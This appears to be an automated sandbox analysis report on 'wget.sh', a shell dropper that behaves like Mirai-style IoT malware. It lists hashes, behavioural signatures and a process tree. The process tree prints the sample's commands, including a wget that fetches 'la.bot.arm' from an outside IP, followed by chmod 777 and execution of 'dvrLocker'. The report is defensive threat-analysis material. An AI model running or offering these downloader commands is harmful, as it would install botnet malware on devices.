Analysis
-
max time kernel
149s -
max time network
112s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhf image:debian9-armhf-20240729-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
18/10/2024, 09:41
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
420B
-
MD5
878878ef9a55d128c2917bfb365e4261
-
SHA1
3f95d013d7602c813cafd4be15c43c37a9c71d2e
-
SHA256
bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a
-
SHA512
dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
677  chmod
682  chmod
694  chmod
Executes dropped EXE 1 IoCs
ioc             pid  Process
/mnt/dvrLocker  678  dvrLocker
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description                    ioc                 Process
File opened for modification   /dev/watchdog       dvrLocker
File opened for modification   /dev/misc/watchdog  dvrLocker
Renames itself 2 IoCs
pid  Process
678  dvrLocker
678  dvrLocker
Reads process memory 1 TTPs 1 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description               ioc           Process
File opened for reading   /proc/1/maps  dvrLocker
Changes its process name 1 IoCs
description                                                        ioc      pid  Process
Changes the process name, possibly in an attempt to hide itself    telnetd  678  dvrLocker
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description                    ioc      Process
File opened for modification   /tmp/.cc wget.sh
Processes
-
/tmp/wget.sh
  command: /tmp/wget.sh
  - Writes file to tmp directory
  PID: 647
  /bin/rm
    command: rm -rf dvrLocker
    PID: 648
  /usr/bin/wget
    command: wget http://103.149.87.69/a/b/la.bot.arm -O -
    PID: 650
  /bin/chmod
    command: chmod 777 dvrLocker
    - File and Directory Permissions Modification
    PID: 677
  /mnt/dvrLocker
    command: ./dvrLocker
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Renames itself
    - Reads process memory
    - Changes its process name
    PID: 678
  /bin/chmod
    command: chmod 777 dvrLocker
    - File and Directory Permissions Modification
    PID: 682
  /bin/chmod
    command: chmod 777 dvrLocker
    - File and Directory Permissions Modification
    PID: 694
  /bin/rm
    command: rm -rf dvrLocker
    PID: 708
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
54KB
MD5
be76a190f3b90d5cb00a5cbc15b112a4
SHA1
da8903c31f36952390ff4975683504b9ceff05ea
SHA256
9258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e
SHA512
0ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771